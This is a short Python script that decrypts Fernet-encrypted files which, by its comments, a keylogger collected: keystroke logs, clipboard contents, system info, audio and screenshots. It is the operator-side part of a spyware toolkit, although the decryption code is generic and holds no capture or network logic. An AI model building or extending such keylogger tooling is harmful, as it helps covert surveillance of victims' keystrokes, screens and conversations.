from cryptography.fernet import Fernet

# Load the encryption key (same key used by the keylogger)
with open("encryption_key.txt", "rb") as key_file:
    key = key_file.read().strip()

# List of encrypted files generated by the keylogger
encrypted_files = [
    "syseminfo.txt.enc",
    "clipboard.txt.enc",
    "key_log.txt.enc",
    "audio.wav.enc",
    "screenshot.png.enc",
]

fernet = Fernet(key)
for enc_file in encrypted_files:
    # Read the encrypted data
    with open(enc_file, "rb") as f:
        encrypted_data = f.read()
    # Decrypt the data
    decrypted_data = fernet.decrypt(encrypted_data)
    # Save to a new file (remove .enc extension from filename)
    output_file = enc_file[:-4]
    with open(output_file, "wb") as f:
        f.write(decrypted_data)
    print(f"Decrypted {enc_file} -> {output_file}")
